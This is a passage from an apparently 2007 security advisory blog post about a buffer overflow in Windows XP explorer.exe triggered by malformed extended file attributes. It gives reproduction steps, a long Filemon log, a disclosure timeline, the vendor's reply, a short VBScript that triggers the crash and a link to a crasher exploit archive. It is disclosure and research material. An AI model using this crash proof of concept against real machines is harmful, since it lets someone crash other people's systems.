AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
4-use filemon http://www.microsoft.com/technet/
sysinternals/FileAndDisk/Filemon.mspx
and include process explorer.exe
5-click on the txt propierties and click on accept or on aply .
6-go to filemon and look the log for explorer.exe you have some
similar to this :
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA FILE
NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA SUCCESS
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA FILE
NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Options:
Create Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER
OVERFLOW FileFsAttributeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Position:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Length:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Length:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER
OVERFLOW FileAllInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA FILE
NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER
OVERFLOW FileAllInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Options:
OverwriteIf Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA BUFFER
OVERFLOW FileFsAttributeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position:
88
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:
88
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:
88
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER
OVERFLOW FileAllInformation
21:24:00.046 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position:
30996
21:24:00.046 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation
the overflow is done :)
affter you can put the hand over the file and explorer show the extended file atributes
and some times filemon mark again the overflow
###################
3-versions tested
###################
i only test with :
Microsof windows XP Home edition all fixes 17/05/2007
Explorer.exe 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
###################
4-Solution
###################
Wait for a update or patch
####################
5-Timeline:
####################
Discovered:12-03-2007
Vendor notify:19-03-2007
Vendor response:22-03-2007
Private disclosure:17-05-2007
Public disclosure:04-06-2007
######################
6-Response from vendor
######################
Thank you for checking up on this case, We have concluded
our investigations on this matter and have found this crash
to be un-exploitable. This vulnerability is very similar to
another milworm posting (http://www.milw0rm.com/exploits/3419.
As we have not been able to find an exploitable angle for
this issue this crash will get tracking into the next available
Service Pack fix.
#####################
7- Test
#####################
1 download this exploit:
http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar
put uncompress it in c:\test or edit in EFA_test.vbs the correct
path were you put the malformed doc file.
2 copy EFA_test.vbs and edit the correct path to file.
3 execute EFA_test.vbs
the file look for the exteded file attributes
of the malformed doc file and wen try to read
the attribute "author" windows Scripting host
Is crashing.
Other overflows could be done in all boxes of
the file propperties.
The applications is crashing because we for look
the malformed doc file use a vbs script.
if any other aplication try to look the malformed
doc file crash too.
this is a simple test using a existing exploit for
microsoft ole32dll.dll , but the overflow is moore deep
is in ntdll.dll because ntdll.dll is the library what use
NtQueryInformationFile for obtain the extended file attributes.
is for that that this overflow it is posible to be
done in all file type with a malformed extended file attributes.
########################################
8-related vulns and documentations
########################################
########################
EFA_test.vbs
########################
Dim arrHeaders(35)
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace("C:\test")
For i = 0 to 34
arrHeaders(i) = objFolder.GetDetailsOf(objFolder.Items, i)
Next
For Each strFileName in objFolder.Items
For i = 0 to 34
Wscript.Echo i & vbtab & arrHeaders(i) _
& ": " & objFolder.GetDetailsOf(strFileName, i)
Next
Next
###################
RELATED VULNS :
###################
http://secunia.com/advisories/10020/
http://secunia.com/advisories/10194/
http://osvdb.org/displayvuln.php?osvdb_id=31885
http://osvdb.org/displayvuln.php?osvdb_id=31886
http://osvdb.org/displayvuln.php?osvdb_id=31887
###################
Related Exploit
###################
http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar
#################
Related Microsoft
security bulletin
#################
http://www.microsoft.com/technet/security/advisory/933052.mspx
##################
RElated functions
##################
extended file attributes
http://en.wikipedia.org/wiki/Extended_file_attributes
GetExtFileProperties()
http://www.kixtart.org/forums/ubbthreads.php?ubb=showflat&Number=160880&page=1
File information class:
http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/
NT%20Objects/File/FILE_INFORMATION_CLASS.html
posible source code of ntdll
http://www.cybertech.net/~sh0ksh0k/projects/old/win32toolkit/ntdll.c
http://www.cybertech.net/~sh0ksh0k/projects/old/win32toolkit/ntdll.h
http://source.winehq.org/source/dlls/ntdll/file.c
the links of ntdll.c and ntdll.h aparently are dead you can try
to search it in google´s cache, sorry for the inconvenience
###############################€nd#########################
thnx To estrella to be my ligth
Thnx To FalconDeOro Hi is investigate and documented with me this issue.
Thnx to Icaro and Badchecksum Team for interesting in research.
Thnx To Jkouns and Jericho for his patience.
Thnx to All osvdb Maglers they are involved in a very nice project.
Thnx to Secunia Research Team They make a Very Good Co-Work with the researchers
They put in my hands all what i need in this and others researchs.
Thnx to All Lostmon´s Group Team
Thnx to Microsoft for the responses.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)